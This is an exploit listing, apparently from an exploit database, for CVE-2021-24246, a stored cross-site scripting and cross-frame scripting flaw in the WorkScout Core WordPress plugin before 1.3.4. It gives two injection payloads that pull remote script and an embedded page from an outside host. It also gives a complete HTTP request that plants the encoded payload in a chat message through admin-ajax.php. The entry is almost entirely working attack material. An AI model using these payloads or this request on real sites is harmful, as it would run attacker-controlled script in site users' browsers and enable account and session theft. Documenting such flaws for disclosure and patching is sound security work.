Exploit for WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS CVE-2021-24246

Name: Exploit for WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS CVE-2021-24246
Rating: 5 (69 reviews)

2021-04-08 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:2365A9D0-F6F4-4602-9804-5AF23D0CB11D
Payloads:
<!-->"><script src=https://m0ze.ru/payload/a.js></script>
<!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>


POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://workscout.in/messages/?action=view&conv_id=163
Cookie: [user cookies]

action=workscout_send_message_chat&recipient=3&conversation_id=163&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E